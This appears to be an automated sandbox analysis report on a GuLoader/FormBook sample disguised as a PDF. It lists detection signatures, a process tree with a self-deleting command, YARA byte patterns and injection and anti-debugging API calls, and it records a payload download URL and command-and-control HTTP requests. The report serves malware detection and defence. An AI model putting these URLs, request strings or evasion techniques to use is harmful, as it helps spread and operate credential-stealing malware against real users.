Loading ...

Play interactive tourEdit tour

Analysis Report TR-D45.pdf.exe

Overview

General Information

Sample Name:TR-D45.pdf.exe
Analysis ID:321007
MD5:937841064411662c36469498ea645660
SHA1:7e72225620b06b6d9f5d54ee45ca2dd7ba10e87e
SHA256:3b162f2943b2ee8d6075b2f8f4cbd7832e11b50ecdfcb4a68cf18eb1c7614651
Tags:exeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TR-D45.pdf.exe (PID: 6060 cmdline: 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: 937841064411662C36469498EA645660)
    • TR-D45.pdf.exe (PID: 3668 cmdline: 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: 937841064411662C36469498EA645660)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6676 cmdline: /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x47b4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Suspicious Double ExtensionShow sources
      Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: 'C:\Users\user\Desktop\TR-D45.pdf.exe' , CommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\TR-D45.pdf.exe, NewProcessName: C:\Users\user\Desktop\TR-D45.pdf.exe, OriginalFileName: C:\Users\user\Desktop\TR-D45.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe' , ParentImage: C:\Users\user\Desktop\TR-D45.pdf.exe, ParentProcessId: 6060, ProcessCommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe' , ProcessId: 3668

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: TR-D45.pdf.exeVirustotal: Detection: 29%Perma Link
      Source: TR-D45.pdf.exeReversingLabs: Detection: 14%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 4x nop then pop ebx1_2_000A7AFD
      Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx12_2_02447AFD
      Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi12_2_02456BD4

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743
      Source: global trafficHTTP traffic detected: GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1Host: www.gcvinternational.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1Host: www.celebrations.sucksConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
      Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
      Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1Host: www.gcvinternational.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1Host: www.celebrations.sucksConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: pilatescollective.com
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.G
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: control.exe, 0000000C.00000002.497562201.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmpString found in binary or memory: https://pilatescollective.com/
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmpString found in binary or memory: https://pilatescollective.com/D4
      Source: TR-D45.pdf.exeString found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin
      Source: TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmpString found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin/
      Source: TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmpString found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin7
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmpString found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin=WyM
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmpString found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.binl
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: TR-D45.pdf.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399264 NtProtectVirtualMemory,0_2_02399264
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239071B EnumWindows,NtSetInformationThread,0_2_0239071B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239877D NtSetInformationThread,0_2_0239877D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399799 NtResumeThread,0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390A92 NtSetInformationThread,TerminateProcess,0_2_02390A92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023989D5 NtSetInformationThread,LoadLibraryA,0_2_023989D5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393721 NtWriteVirtualMemory,0_2_02393721
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239371B NtWriteVirtualMemory,0_2_0239371B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393787 NtWriteVirtualMemory,0_2_02393787
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023907E7 NtSetInformationThread,0_2_023907E7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023937DC NtWriteVirtualMemory,0_2_023937DC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023917D1 NtSetInformationThread,0_2_023917D1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023937D3 NtWriteVirtualMemory,0_2_023937D3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023997D7 NtResumeThread,0_2_023997D7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398486 NtSetInformationThread,0_2_02398486
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023915D6 NtSetInformationThread,0_2_023915D6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393A2B NtWriteVirtualMemory,0_2_02393A2B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399A23 NtResumeThread,0_2_02399A23
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393A7F NtWriteVirtualMemory,0_2_02393A7F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399A57 NtResumeThread,0_2_02399A57
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02391AAA NtSetInformationThread,0_2_02391AAA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399A87 NtResumeThread,0_2_02399A87
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393AE3 NtWriteVirtualMemory,0_2_02393AE3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399B17 NtResumeThread,0_2_02399B17
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399B53 NtResumeThread,0_2_02399B53
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393B43 NtWriteVirtualMemory,0_2_02393B43
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02397BBE NtSetInformationThread,0_2_02397BBE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393B97 NtWriteVirtualMemory,0_2_02393B97
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399B8F NtResumeThread,0_2_02399B8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393BDE NtWriteVirtualMemory,0_2_02393BDE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399BD7 NtResumeThread,0_2_02399BD7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399837 NtResumeThread,0_2_02399837
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393823 NtWriteVirtualMemory,0_2_02393823
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399807 NtResumeThread,0_2_02399807
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239387B NtWriteVirtualMemory,0_2_0239387B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239087B NtSetInformationThread,0_2_0239087B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239989F NtResumeThread,0_2_0239989F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023998F7 NtResumeThread,0_2_023998F7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023998CB NtResumeThread,0_2_023998CB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023908C7 NtSetInformationThread,0_2_023908C7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399933 NtResumeThread,0_2_02399933
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239092B NtSetInformationThread,0_2_0239092B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239397F NtWriteVirtualMemory,0_2_0239397F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023999BB NtResumeThread,0_2_023999BB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393985 NtWriteVirtualMemory,0_2_02393985
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023999F7 NtResumeThread,0_2_023999F7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023919D3 NtSetInformationThread,0_2_023919D3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023939D7 NtWriteVirtualMemory,0_2_023939D7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399E07 NtResumeThread,0_2_02399E07
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02391E85 NtSetInformationThread,0_2_02391E85
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F0A NtSetInformationThread,0_2_02392F0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02397FCC NtSetInformationThread,0_2_02397FCC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399C1F NtResumeThread,0_2_02399C1F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399C57 NtResumeThread,0_2_02399C57
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393C43 NtWriteVirtualMemory,0_2_02393C43
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399CB7 NtResumeThread,0_2_02399CB7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393CC3 NtWriteVirtualMemory,0_2_02393CC3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393D1F NtWriteVirtualMemory,0_2_02393D1F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399D1F NtResumeThread,0_2_02399D1F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399D5F NtResumeThread,0_2_02399D5F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393D8B NtWriteVirtualMemory,0_2_02393D8B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399DD3 NtResumeThread,0_2_02399DD3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02393DCB NtWriteVirtualMemory,0_2_02393DCB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E2A9660
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E2A96E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E2A9710
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E2A97A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E2A9780
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9540 NtReadFile,LdrInitializeThunk,1_2_1E2A9540
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A95D0 NtClose,LdrInitializeThunk,1_2_1E2A95D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9A20 NtResumeThread,LdrInitializeThunk,1_2_1E2A9A20
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E2A9A00
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9A50 NtCreateFile,LdrInitializeThunk,1_2_1E2A9A50
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E2A9860
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9840 NtDelayExecution,LdrInitializeThunk,1_2_1E2A9840
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E2A98F0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E2A9910
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A99A0 NtCreateSection,LdrInitializeThunk,1_2_1E2A99A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9610 NtEnumerateValueKey,1_2_1E2A9610
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9670 NtQueryInformationProcess,1_2_1E2A9670
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9650 NtQueryValueKey,1_2_1E2A9650
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A96D0 NtCreateKey,1_2_1E2A96D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9730 NtQueryVirtualMemory,1_2_1E2A9730
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2AA710 NtOpenProcessToken,1_2_1E2AA710
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9760 NtOpenProcess,1_2_1E2A9760
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2AA770 NtOpenThread,1_2_1E2AA770
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9770 NtSetInformationFile,1_2_1E2A9770
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9FE0 NtCreateMutant,1_2_1E2A9FE0
